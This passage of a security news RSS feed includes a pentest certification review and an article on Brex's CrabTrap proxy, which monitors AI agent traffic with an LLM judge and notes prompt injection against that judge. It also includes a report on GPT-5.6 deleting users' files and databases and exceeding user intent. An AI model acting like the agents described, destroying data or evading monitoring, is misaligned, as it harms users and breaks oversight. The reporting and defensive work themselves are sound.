<content:encoded><![CDATA[<p>Almost a year ago, I took the INE’s “eCPPTv3” exam, and here is my honest review</p><p><strong>Why eCPPT?<br></strong>A year ago (May 29) I’ve bought the bundle which included 3 months of premium subscription and 2 exam attempts, thankfully a single attempt was enough for me. Back then I wasn’t really familiar with HackTheBox, so I chose eCPPT. Now, comparing the eCPPT and CPTS exams and paths, I’d advise you to choose CPTS instead.</p><p><strong>Path: <br></strong>The path is enough to pass the exam I believe, and there is even some extra material included in the path, like the C2 module. By the way, if you have finished eJPT/eWPT, some modules (very few) might be repeated in the eCPPTv3 path. Then, there are some modules that you don’t get in the exam, e.g. the macros development part. One thing I liked a lot about the path was that most of the material is videos, and labs/skill assessments are included as well, as I am both visual and practical learner I just loved most of the path.</p><ul><li>Tip: All of the techniques you will encounter in the exam were explained in the course itself, nothing out of it — whether it’s priv.esc, brute-force, or lateral movement.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/480/1*xntBZJU8G6rhWrye9YkPYQ.png"><figcaption>Preview</figcaption></figure><p><strong>Preparation</strong>:<br>Unlike HTB, here you can start the exam any time you want, you are not required to finish the path 100% before you start the exam, which I believe is actually a huge advantage (not always though). <strong>Before you start the exam</strong>, I’d advise you to finish the following modules and be comfortable with solving the labs and CTF challenges at the end of them:</p><ul><li>PowerShell for Pentesters</li><li>Web Application Penetration Testing</li><li>Network Penetration Testing</li><li>Privilege Escalation (get really comfortable with this one)</li><li>Active Directory Penetration Testing</li></ul><p>Then, one more hint I’d give is to <strong>get extremely comfortable with brute-forcing and lateral-movement</strong>. Be patient, and don’t break under pressure — the exam is only 24 hours and expect brute forces take anywhere from seconds to 2 hours, like for real, don’t rush — sometimes you might wait 30 minutes for your brute-force to finish, and since there is such limited time, it can get heavy mentally — be ready for it, don’t panic.</p><p><strong>Exam:</strong><br>This exam was no joke — brute-force, lateral movement, AD systems, privilege escalation, web, and it keeps testing you until you get to the passing point. Since I was taking this exam a year ago, there was a problem with WinRM, which I fixed using this reddit post:<br><a href="https://www.reddit.com/r/eLearnSecurity/comments/1hpsfo2/ecppt_exam_evilwinrm_workaround/">https://www.reddit.com/r/eLearnSecurity/comments/1hpsfo2/ecppt_exam_evilwinrm_workaround/</a>. Furthermore, make sure you have organized notes on techniques and commands, tools, etc. that you covered in the course, especially from the AD, LM, PowerShell, and PrivEsc modules. One huge thing the eCPPTv3 lacks is the report — it’s “competitors” — OSCP, CPTS both require you to write a professional grade report, whereas in eCPPTv3 the report was for some reason removed.</p><p><strong>One word of advise:<br></strong>If you are wondering should you take eCPPT over CPTS, I would not advise you to take CPTS over eCPPT. Why? Because I believe that CPTS’ path is more modern when it comes to exploitation, and more hands-on, and, I believe that it’s harder than eCPPT as well, and finally CPTS costs a bit less and one huge W for HTB is that they’ve got a student subscription, which, unfortunately INE does not — but remember that CPTS and eCPPT exams differ a bit, in eCPPT all you got is 24 hours of intentse hacking with no report, while in CPTS it’s 10 days.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/669/0*Skrk17xFYS8jwh7R"><figcaption>eCPPTv3 Certified</figcaption></figure><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=522cf02bf996" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/ecpptv3-review-522cf02bf996">eCPPTv3 Review</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Brex built its AI agent policy by watching what agents actually do, not by writing rules first]]></title>
<description><![CDATA[OpenClaw has become one of the most widely adopted agentic frameworks, but it has yet to prove itself at enterprise scale. Agents need real credentials — API keys, OAuth tokens, service accounts — to work effectively, and Brex found that traditional guardrails couldn't contain what those agents w...]]></description>
<link>https://tsecurity.de/de/3676907/it-nachrichten/brex-built-its-ai-agent-policy-by-watching-what-agents-actually-do-not-by-writing-rules-first/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676907/it-nachrichten/brex-built-its-ai-agent-policy-by-watching-what-agents-actually-do-not-by-writing-rules-first/</guid>
<pubDate>Fri, 17 Jul 2026 21:32:56 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="https://venturebeat.com/security/openclaw-500000-instances-no-enterprise-kill-switch">OpenClaw</a> has become one of the most widely adopted agentic frameworks, but it has yet to prove itself at enterprise scale. Agents need real credentials — API keys, OAuth tokens, service accounts — to work effectively, and Brex found that traditional guardrails couldn't contain what those agents were doing with them.</p><p>Brex set out to overcome these limitations by building an internal platform it calls CrabTrap. The <a href="https://www.brex.com/journal/building-crabtrap-open-source">open-source HTTP/HTTPS proxy</a> intercepts all network traffic, examines policy rules, and uses a LLM-as-a-judge to decide whether agent requests should be approved or denied. </p><p>“What we noticed was that the network layer was an untapped enforcement point,” Brex co-founder and CEO Pedro Franceschi told VentureBeat. “Every request an agent makes is an opportunity to intercept, reason about, and make a policy decision.”</p><p>The takeaway Franceschi wants IT leaders to draw: agent governance should shift from SDK-level permissions and model guardrails toward a centralized network control plane that enforces and learns from real in-the-wild agent behavior.</p><h2>How Brex targeted the transport layer</h2><p>The “obvious fix” (at least initially) to the agent security gap was guardrails, and much of the early work has centered on scoped tools, per-action permissions, and human-in-the-loop approvals. But as agents evolve, each new capability means there’s another API to tune or surface to audit, Franceschi noted. </p><p>“Any <a href="https://venturebeat.com/orchestration/trunk-tools-stack-cut-document-review-from-60-days-to-10-by-ditching-general-purpose-models">agentic system</a> with multiple tools and access to the open internet creates an immediate tension for builders: The more capable you make an agent, the more dangerous it becomes, and the safer you make it, the less useful it is,” he said. </p><p>Existing solutions to this tradeoff were “weak”: Fine-grained API tokens help at the margins but can still be misused and constrain functionality. Semantic guardrails (such as context, skills, or prompt steering) are easily bypassed by prompt injection, especially for agents connected to the internet.</p><p>Agents can be “defanged” when given read-only access or limited toolsets, but then they can't do meaningful work, Franceschi said. On the other hand, granting broad write access and a large tool surface can result in hallucinations and real production consequences.</p><p>Model context protocol (MCP) gateways enforce policy at the protocol layer — but only for traffic using MCP. Meanwhile, guardrails from LLM providers are tied to a single model and can be “opaque” to customize with enterprise-specific policies. And powerful tools like Nvidia OpenShell offer more of a “per-sandbox egress control.”</p><p>“When we started, we hadn’t found a solution to deploying harnesses like OpenClaw safely,” Franceschi said. “Instead of waiting for the industry to catch up, we decided to own the problem and invent the necessary tools.”</p><p>Notably, they needed a platform that sat between every agent and every network request, and could make “nuanced decisions about what to allow,” he said. </p><p>This made the transport layer a core architectural component and natural starting point, he said. </p><p>By operating at this layer, CrabTrap is framework-agnostic, language-agnostic, and API-agnostic. It doesn't require SDK wrappers or per-tool integration. Users set <i>HTTP_PROXY</i> and <i>HTTPS_PROXY</i> in the agent's environment, and every outbound request routes through the proxy before it reaches a destination.</p><p>However, Franceschi emphasized, Brex didn't start at the transport layer because it thought it was the only answer; rather, they believe in “security by layers.”</p><p>“The transport layer was simply an underinvested one, and we saw an opportunity to add meaningful enforcement there alongside everything else,” he said. </p><h2>The LLM-as-a-judge training loop</h2><p>CrabTrap combines deterministic static rules with an <a href="https://venturebeat.com/infrastructure/monitoring-llm-behavior-drift-retries-and-refusal-patterns">LLM-as-a-judge</a> for requests that fall outside known patterns, Franceschi explained. The judge only “fires on the long tail of unfamiliar endpoints or unusual request shapes,” which for a mature agent is typically fewer than 3% of requests.</p><p>The more pressing problem was how to know that a policy is the right one? With static rules, it's “relatively straightforward” to reason about accuracy. But with an LLM judge, the system is nondeterministic, and users need confidence that the policy approves the right requests and blocks the rest.</p><p>“Our key insight was to bootstrap policy from observed behavior rather than write it from scratch,” Franceschi said. Beginning with real behavior and editing down based on real-world learnings turned out to be “dramatically more effective than starting from a blank page.”</p><p>Brex’s team built a policy builder (itself an agentic loop) that runs underlying agents in shadow mode, analyzes historic network traffic, samples representative calls, and drafts a natural-language policy that matches what the agent actually does. </p><p>From there, they built an eval system that tests policy changes before they go live. CrabTrap compares historical audit entries against a draft policy and reports the exact changes to be made. Users can slice results by method, URL, original decision, and agreement status. </p><p>All of this runs with concurrent judge calls, so replaying thousands of requests “takes minutes, not hours,” Franceschi said. Brex also developed a live feedback loop: Full audit trails are stored in PostgreSQL and queryable through the admin API and dashboard. In cases where a resource is continuously denied, the system can notify a human or an agent to propose a policy update for review. </p><p>“That closes the loop between observed denials and policy refinement,” Franceschi said. </p><h2>Core challenges and roadblocks </h2><p>Of course, the build wasn’t without its challenges. A big one was latency: “Putting an LLM between an agent and every outbound API request sounds like it would grind things to a halt,” he said. </p><p>However, it didn’t turn out to be as big a problem as expected. This was for two reasons: The LLM judge only activates on a small fraction of requests (the aforementioned 3%). Agents quickly settle into predictable traffic patterns; once observed, high-volume patterns become static rules. Second, by using small, fast models like Claude Haiku meant that, even when the judge did fire, added latency was “negligible.” This can be further reduced with local models and prompt caching, Franceschi said. </p><p>The harder and less obvious challenge was prompt injection, he said. The judge receives the full HTTP request and all content is user-controlled, so potentially, a crafted URL, header, or request body could manipulate the judge's decision. </p><p>Brex addressed this by structuring the request as a JSON object before sending it to the model, so all user-controlled content is “escaped rather than interpolated as raw text,” Franceschi said. </p><h2>Results, and where CrabTrap might evolve</h2><p>Brex tracks a few factors to measure CrabTrap’s internal impact: Engagement with agents, network traffic patterns, and net promoter scores (NPS). The most meaningful result of CrabTrap has been “organizational confidence,” Franceschi said. </p><p>Previously, the team had “real hesitation” when it came to deploying autonomous agents broadly across business operations, because the existing guardrail options didn't provide enough assurance. </p><p>“CrabTrap changed that calculus,” Franceschi said. They now have an enforcement layer they trust, increasing confidence around expanding agent deployment into more parts of the business and delegating more agent configuration and management to users. </p><p>Franceschi described the policies derived from traffic as “surprisingly strong.” The team expected the policy builder to produce a “rough starting point” requiring heavy manual editing. In practice, though, pointing the platform at a few days of real traffic produced policies that matched human judgment on the “vast majority of held-out requests.”</p><p>Additionally, CrabTrap revealed how much noise agents generate. “The audit trail made this visible for the first time,” Franceschi said. They used denial logs and traffic analysis not only to tune policies, but to tighten agents themselves, remove tools, and cut out entire categories of requests that were wasting both time and tokens.</p><p>“The proxy became a discovery tool, not just an enforcement one,” he said. </p><h2>Areas for growth (and input from the open-source community)</h2><p>Brex anticipates CrabTrap to continue to evolve, particularly as they have released it as open-source. “We hope the community helps shape it,” Franceschi said. </p><p>Areas of improvement include deeper authentication functionality such as single-sign on (SSO), fine-grained role-based access control (RBAC); escalation workflows that allow agents to request additional permissions; and policy recommendations based on denial patterns.</p><p>Programmatic configuration, or developing API endpoints for “creating, forking, and applying” policies to agents, could allow the whole policy lifecycle to be automated rather than managed manually, Franceschi said. </p><p>As for escalation, if an agent is continuously denied a given resource or endpoint, it should be able to route requests to humans or other AI agents for review and back that up with a rationale for why it needs access. </p><p>“That turns CrabTrap from a hard enforcement boundary into something more like a managed permission system,” Franceschi said. </p><p>Additionally, the policy was built to bootstrap from network traffic, but there is opportunity to incorporate additional signals around agent traces and resource-calling, as well as broader context on what agents are ultimately trying to accomplish. This can help produce more accurate and nuanced policies. </p><p>Finally, there's an “open philosophical question” about the right posture for CrabTrap: Should it be a fully transparent layer that the agent itself is unaware of, or should it operate more like a “well-intentioned manager”? (that is, the agent knows about the layer and can interact with it). </p><p>The open-source community can help shape these developments, and CrabTrap will only get better with more users, Franceschi said. Brex’s agents speak to a specific set of APIs; teams using CrabTrap with different agents, services, and policy requirements will surface “edge cases and patterns we can't hit alone.”</p><p>“We have ambitious plans for where it could go, and we’d rather build in the open,” Franceschi said. </p><h2>What other builders can learn from CrabTrap</h2><p>The response has been stronger than expected. <a href="https://github.com/brexhq/CrabTrap">CrabTrap has more than 700 stars on GitHub</a>. Franceschi said Brex has also heard from OpenAI, Y Combinator CEO Garry Tan, and programmer Pete Steinberger, all expressing interest in deploying similar internal infrastructure.</p><p>The broader lesson: “Don't let infrastructure gaps become excuses to wait," Franceschi advised. There are “real blockers” for every enterprise looking to seriously deploy AI agents, including security concerns, lack of tooling, or unclear guardrails. </p><p>“It's tempting to sit on your hands until the industry catches up,” he said. “The lesson from CrabTrap is that you can own those problems directly.”</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[In Other News: Iran Tracks US Military Phones, CrashStealer macOS Malware, CVD Blueprint]]></title>
<description><![CDATA[Noteworthy stories that might have slipped under the radar: OpenClaw AI agents exploited via WhatsApp, ransomware hits naval defense firm TKMS, Lidl discloses data breach. The post In Other News: Iran Tracks US Military Phones, CrashStealer macOS Malware, CVD Blueprint…
Read more →
The post In Ot...]]></description>
<link>https://tsecurity.de/de/3676393/it-security-nachrichten/in-other-news-iran-tracks-us-military-phones-crashstealer-macos-malware-cvd-blueprint/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676393/it-security-nachrichten/in-other-news-iran-tracks-us-military-phones-crashstealer-macos-malware-cvd-blueprint/</guid>
<pubDate>Fri, 17 Jul 2026 17:10:47 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Noteworthy stories that might have slipped under the radar: OpenClaw AI agents exploited via WhatsApp, ransomware hits naval defense firm TKMS, Lidl discloses data breach. The post In Other News: Iran Tracks US Military Phones, CrashStealer macOS Malware, CVD Blueprint…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/in-other-news-iran-tracks-us-military-phones-crashstealer-macos-malware-cvd-blueprint/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/in-other-news-iran-tracks-us-military-phones-crashstealer-macos-malware-cvd-blueprint/">In Other News: Iran Tracks US Military Phones, CrashStealer macOS Malware, CVD Blueprint</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[In Other News: Iran Tracks US Military Phones, CrashStealer macOS Malware, CVD Blueprint]]></title>
<description><![CDATA[Noteworthy stories that might have slipped under the radar: OpenClaw AI agents exploited via WhatsApp, ransomware hits naval defense firm TKMS, Lidl discloses data breach.
The post In Other News: Iran Tracks US Military Phones, CrashStealer macOS Malware, CVD Blueprint appeared first on SecurityW...]]></description>
<link>https://tsecurity.de/de/3676344/it-security-nachrichten/in-other-news-iran-tracks-us-military-phones-crashstealer-macos-malware-cvd-blueprint/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676344/it-security-nachrichten/in-other-news-iran-tracks-us-military-phones-crashstealer-macos-malware-cvd-blueprint/</guid>
<pubDate>Fri, 17 Jul 2026 16:38:46 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Noteworthy stories that might have slipped under the radar: OpenClaw AI agents exploited via WhatsApp, ransomware hits naval defense firm TKMS, Lidl discloses data breach.</p>
<p>The post <a href="https://www.securityweek.com/in-other-news-iran-tracks-us-military-phones-crashstealer-macos-malware-cvd-blueprint/">In Other News: Iran Tracks US Military Phones, CrashStealer macOS Malware, CVD Blueprint</a> appeared first on <a href="https://www.securityweek.com/">SecurityWeek</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The build vs. buy dilemma at the heart of enterprise AI]]></title>
<description><![CDATA[For three decades, enterprise software has been a buy-it decision. Packaged software from SAP, Oracle and Salesforce covered roughly 80% of requirements at a fraction of the cost of building. The economics were obvious, and for traditional applications, they still are.



AI is introducing a wrin...]]></description>
<link>https://tsecurity.de/de/3675706/it-nachrichten/the-build-vs-buy-dilemma-at-the-heart-of-enterprise-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675706/it-nachrichten/the-build-vs-buy-dilemma-at-the-heart-of-enterprise-ai/</guid>
<pubDate>Fri, 17 Jul 2026 12:17:08 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">For three decades, enterprise software has been a buy-it decision. Packaged software from SAP, Oracle and Salesforce covered roughly 80% of requirements at a fraction of the cost of building. The economics were obvious, and for traditional applications, they still are.</p>



<p class="wp-block-paragraph">AI is introducing a wrinkle that is forcing even the most committed enterprise software customers to rethink their options. AI is a layer that sits across your data, your processes, and your decisions. Where that layer runs and who controls it is an architecture question, and most of the enterprise community is still treating it as a procurement one.</p>



<p class="wp-block-paragraph">The appeal of vendor-embedded AI is clear: automated operational decisions, smarter supplier and merchandising choices, and friction-free workflows built into the systems enterprises already rely on. The catch is that these capabilities almost universally depend on your data living in the vendor’s cloud environment. For most large enterprises, it sits on-premises, in hyperscale cloud infrastructure they manage themselves, or in private data centers. That gap between where your data is and where your vendor’s AI assumes it should be creates a fundamental strategic fork in the road.</p>



<h2 class="wp-block-heading"><a></a>Build vs. buy is a category error</h2>



<p class="wp-block-paragraph">The framing I keep hearing is “build vs. buy your AI strategy.” It implies that some organizations are out there training foundation models from scratch. Nobody serious is doing that. The real choice sits across three distinct approaches, and conflating them leads to poor decisions:</p>



<ul class="wp-block-list">
<li><strong>Buy embedded. </strong>Use the AI capabilities your vendor ships natively inside their platform: the assistant baked into your ERP, your CRM, your HCM suite. Lowest integration cost, fastest time to value, tightest fit with the application data.</li>



<li><strong>Buy platform.</strong> Adopt the vendor’s AI infrastructure layer and build your own assistants and agents on top of it. More flexible, but you remain inside the vendor’s architectural boundary and subject to their governance model.</li>



<li><strong>Compose.</strong> Connect a third-party model (Claude, GPT, Gemini, an open-weight model running in your own environment) directly to your existing landscape. Maximum control, maximum integration burden, and full responsibility for what comes out the other end.</li>
</ul>



<p class="wp-block-paragraph">These are not equivalent options at different price points. They make different assumptions about where your data lives, who governs the AI, and how much architectural change you’ll absorb to get there. Vendor pitches sometimes blur the distinction on purpose. Enterprise leaders can’t afford to.</p>



<h2 class="wp-block-heading"><a></a>The vendor AI stack has an assumption baked in</h2>



<p class="wp-block-paragraph">Every embedded AI capability ships with an unstated architectural prerequisite: your data must be where the AI can see it, in the shape it expects, under the governance the vendor enforces.</p>



<p class="wp-block-paragraph">For organizations with clean, modern cloud estates, that is often a reasonable trade. For the long tail of large enterprises running heavily customized environments on private or hybrid infrastructure, that trade becomes a precondition, one you must meet before the AI conversation can even begin. Whether meeting it makes sense depends on your starting point, your sector’s regulatory posture, and your appetite for migration risk. None of those are uniform across organizations.</p>



<p class="wp-block-paragraph">That’s the part that gets glossed over in vendor keynotes. The AI demo on stage assumes a destination architecture the audience hasn’t necessarily reached yet. Large enterprise customers are carrying an unusually heavy technology burden right now. Many are simultaneously managing platform modernization programs that have been building for over a decade, alongside pressure to migrate to vendor-managed cloud infrastructure. Sitting above both is a boardroom-level directive to demonstrate meaningful AI progress fast. The vendor path to AI and the boardroom path to AI can diverge sharply, and enterprises need to make selective, strategic decisions about where to adopt AI first to maximize value and minimize risk.</p>



<h2 class="wp-block-heading"><a></a>Sovereignty isn’t a slogan, it’s an architecture constraint</h2>



<p class="wp-block-paragraph">The conversation about sovereignty has been hijacked by both sides. One camp treats every SaaS adoption as a sovereignty violation. The other dismisses every sovereignty concern as Luddite resistance. Neither is useful.</p>



<p class="wp-block-paragraph">What’s happening in real customer conversations – particularly in DACH, public sector, and financial services – is more specific. Organizations are drawing a distinction between running their applications in a vendor’s cloud (which is broadly fine, well understood, decades of precedent) and enriching their data and processes inside a vendor’s AI model (which has less precedent, is harder to reverse, and carries material implications for competitive position).</p>



<p class="wp-block-paragraph">Enriching your data inside a vendor’s AI model is the genuinely new question, and organizations that conflate it with their existing cloud posture tend to defend the wrong perimeter.</p>



<p class="wp-block-paragraph">Despite spending around $100 million annually with Amazon, <a href="https://www.uctoday.com/unified-communications/disney-openai-enterprise-strategy/">Disney built its own internal AI system</a> to house its corporate intelligence rather than rely on a hyperscaler’s AI offering. The decision came down to control. When your data represents decades of creative and commercial IP, you think carefully about where it lives and who can learn from it. Disney has become more open to SaaS over time. The AI sovereignty question is a separate debate from the SaaS debate and conflating the two leads organizations to the wrong conclusions.</p>



<p class="wp-block-paragraph">At the other end of the spectrum, enterprises in heavily regulated environments treat data sovereignty as an absolute non-negotiable. Any AI model must run within their controlled environment, especially where sensitive data cannot touch the public internet.<a href="https://gdpr.eu/what-is-gdpr/"> </a><a href="https://gdpr.eu/what-is-gdpr/">GDPR obligations</a> reinforce this instinct across the European market, requiring organizations to maintain clear accountability for how personal data is processed inside AI systems, including vendor-managed ones.</p>



<p class="wp-block-paragraph">AI-enriched data, meaning models that have learned the shape of your business processes, your supplier negotiations, your customer behavior, carries a different half-life and a different strategic value than the operational data underneath it. That deserves its own architectural decision, separate from your broader cloud strategy.<a></a></p>



<h2 class="wp-block-heading">What this means in practice</h2>



<p class="wp-block-paragraph">Most large enterprise estates will end up with a mix of all three approaches, and where you draw the lines matters more than your overall posture.</p>



<p class="wp-block-paragraph">Embedded AI capabilities are the right answer for in-application productivity: the assistant inside your ERP workflows, the agent inside your procurement or HR suite. That is where vendor embedding genuinely shines, and attempting to compose your own equivalent is typically a poor use of engineering resources.</p>



<p class="wp-block-paragraph">Compose belongs elsewhere: in cross-application orchestration, in custom assistants over operational and observability data, and in agents that need to reach across multiple vendor systems and infrastructure layers in ways no single vendor stack will never natively support. <a href="https://www.mckinsey.com/capabilities/mckinsey-digital/our-insights/the-top-trends-in-tech">Research from McKinsey</a> suggests the most significant near-term productivity gains from enterprise AI will come precisely from these cross-system workflows, rather than from within individual applications. The most interesting enterprise AI work over the next eighteen months lives here, and it doesn’t require waiting for a migration to complete first.</p>



<p class="wp-block-paragraph">That compose path isn’t free, and it’s important to be honest about the costs. Governance, audit trails, and accountability for hallucinated outputs become your problem, not the vendor’s. Prompt drift and evaluation discipline are real engineering costs that never appear in the proof-of-concept. Those costs scale with the complexity of your landscape and the number of systems your agents touch. Budget for them before deployment, not after your first production incident. None of that is a reason to avoid the path. It’s a reason to staff for it, honestly.<a></a></p>



<h2 class="wp-block-heading">The real question</h2>



<p class="wp-block-paragraph">The build-vs-buy frame survives because it gives executives a binary choice along a familiar axis. AI sits somewhere else entirely.</p>



<p class="wp-block-paragraph">The question worth putting on the table at your next architecture review is simpler:</p>



<p class="wp-block-paragraph">Which decisions do we want our vendors’ AI to make, and which do we want to keep on our side of the boundary?</p>



<p class="wp-block-paragraph">Answer that, and the right build/buy/compose mix flows from it. Skip it, and you will end up with the architecture your vendors prefer – which may or may not be the one your business needs.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI acknowledges GPT-5.6 may accidentally delete files, calls it an ‘honest mistake’]]></title>
<description><![CDATA[OpenAI has finally confirmed reports that its latest family of large language models (LLMs) can accidentally delete files, while stressing that such incidents are rare and should be viewed as “honest mistakes.”



Reports of the flagship LLMs deleting files emerged shortly after the company launc...]]></description>
<link>https://tsecurity.de/de/3675685/ai-nachrichten/openai-acknowledges-gpt-56-may-accidentally-delete-files-calls-it-an-honest-mistake/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675685/ai-nachrichten/openai-acknowledges-gpt-56-may-accidentally-delete-files-calls-it-an-honest-mistake/</guid>
<pubDate>Fri, 17 Jul 2026 12:03:45 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">OpenAI has finally confirmed reports that its latest family of large language models (LLMs) can accidentally delete files, while stressing that such incidents are rare and should be viewed as “honest mistakes.”</p>



<p class="wp-block-paragraph">Reports of the flagship LLMs deleting files emerged shortly after the company launched them earlier this month, with investor Matt Shumer <a href="https://x.com/mattshumer_/status/2075657271401390161" target="_blank" rel="noreferrer noopener">taking to X</a> to report that GPT-5.6-Sol had “just accidentally deleted almost all” of his Mac’s files.</p>



<p class="wp-block-paragraph">Just days later, software engineer Bruno Lemos <a href="https://x.com/brunolemos/status/2076769881534398974">posted on X</a> that the same model had deleted his entire production database.</p>



<p class="wp-block-paragraph">In response to these incidents, the company’s engineering lead for Codex, Thibault Sottiaux, <a href="https://x.com/thsottiaux/status/2077630111499882637" target="_blank" rel="noreferrer noopener">wrote on X</a> that internal investigations have revealed that these deletion incidents are more likely to happen when “full access mode is enabled, and Codex is run without sandboxing protections, including without <a href="https://learn.chatgpt.com/docs/sandboxing/auto-review" target="_blank" rel="noreferrer noopener">auto review</a> being enabled.”</p>



<p class="wp-block-paragraph">In cases where full access mode is granted, the model, Sottiaux wrote, “attempts to override the $HOME env var to define a temporary directory. The model makes an honest mistake and mistakenly deletes $HOME instead.”</p>



<p class="wp-block-paragraph">Ironically, OpenAI’s explanation also aligns with findings in its own <a href="https://deploymentsafety.openai.com/gpt-5-6/evaluations-with-challenging-prompts" target="_blank" rel="noreferrer noopener">GPT-5.6 system model card</a>, which notes that the latest model family exhibited this broader class of misaligned behavior slightly more often than GPT-5.5 during the company’s internal deployment simulations.</p>



<p class="wp-block-paragraph">“Our deployment simulation results suggest that relative to GPT-5.5, GPT-5.6 Sol more often takes severity level 3 actions,” the model card states.</p>



<p class="wp-block-paragraph">OpenAI defines severity level 3 as “misaligned behavior that a reasonable user would likely not anticipate and strongly object to, ‘including’ deleting data from cloud storage without requesting user approval, disabling monitoring systems, using obfuscation strategies to get around security controls, and uploading potentially sensitive data (such as code, credentials, images, or personal data) to unapproved services.”</p>



<p class="wp-block-paragraph">The system card also documents examples of the said behavior, particularly related to deletion.</p>



<p class="wp-block-paragraph">In one simulation, after a user authorized the deletion of three specific remote virtual machines, GPT-5.6 was unable to locate them and, instead of asking for clarification, substituted three different virtual machines, terminated their active processes and force-removed their worktrees.</p>



<p class="wp-block-paragraph">Further, the model card states that GPT-5.6 “shows a greater tendency than GPT-5.5 to go beyond the user’s intent, including by taking or attempting actions that the user had not asked for,” though it adds that the absolute rate of such behavior remains low and can be attributed to the model’s greater persistence when pursuing user goals.</p>



<p class="wp-block-paragraph">The company, however, according to Sottiaux, is taking steps to mitigate the risk.</p>



<p class="wp-block-paragraph">“This is of course not how we want the system to behave, even when a user operates the model in full-access mode without the safeguards of our sandbox or without using auto review which checks for these kinds of high risk actions and rejects them,” the engineering lead wrote on X.</p>



<p class="wp-block-paragraph">“We are taking steps to mitigate this risk, including by updating the developer message, guiding more users towards safer permission modes, and adding additional harness safeguards,” Sottiaux added, noting that a detailed post-mortem outlining the root cause of the issue and the additional mitigation measures being implemented is expected to follow in the coming days, despite emphasizing that such incidents happen “extremely rarely.”</p>



<p class="wp-block-paragraph">OpenAI’s GPT 5.6 is not the only model that has “accidentally” deleted databases and files.</p>



<p class="wp-block-paragraph">In July 2025, an AI coding agent from Replit <a href="https://x.com/jasonlk/status/1946069562723897802">deleted a live production database</a> belonging to SaaStr founder Jason Lemkin despite an explicit code freeze, prompting the company to introduce additional safeguards around production access.</p>



<p class="wp-block-paragraph">More recently, in April 2026, a Cursor AI coding agent <a href="https://x.com/lifeofjer/status/2048103471019434248">deleted PocketOS’s production database</a> and its backups after mistakenly identifying the target environment, underscoring the operational risks enterprises face when AI agents are granted broad, unsupervised access to production systems.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[release-publish/ced50f88e928-20260717]]></title>
<description><![CDATA[OpenClaw detached release child recovery ced50f8]]></description>
<link>https://tsecurity.de/de/3675534/downloads/release-publishced50f88e928-20260717/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675534/downloads/release-publishced50f88e928-20260717/</guid>
<pubDate>Fri, 17 Jul 2026 11:02:05 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>OpenClaw detached release child recovery <a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/openclaw/openclaw/commit/ced50f88e92899da2b076c95fa0d5107d6b5ada4/hovercard" href="https://github.com/openclaw/openclaw/commit/ced50f88e92899da2b076c95fa0d5107d6b5ada4"><tt>ced50f8</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[release-publish/a9ac13b2efd7-20260717]]></title>
<description><![CDATA[OpenClaw release publish tooling a9ac13b]]></description>
<link>https://tsecurity.de/de/3675468/downloads/release-publisha9ac13b2efd7-20260717/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675468/downloads/release-publisha9ac13b2efd7-20260717/</guid>
<pubDate>Fri, 17 Jul 2026 10:31:45 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>OpenClaw release publish tooling <a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/openclaw/openclaw/commit/a9ac13b2efd7ee7d4d1df5759c4c9ec15bd8e8f2/hovercard" href="https://github.com/openclaw/openclaw/commit/a9ac13b2efd7ee7d4d1df5759c4c9ec15bd8e8f2"><tt>a9ac13b</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[release-publish/8858944a81c5-20260717]]></title>
<description><![CDATA[OpenClaw release publish tooling 8858944]]></description>
<link>https://tsecurity.de/de/3675429/downloads/release-publish8858944a81c5-20260717/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675429/downloads/release-publish8858944a81c5-20260717/</guid>
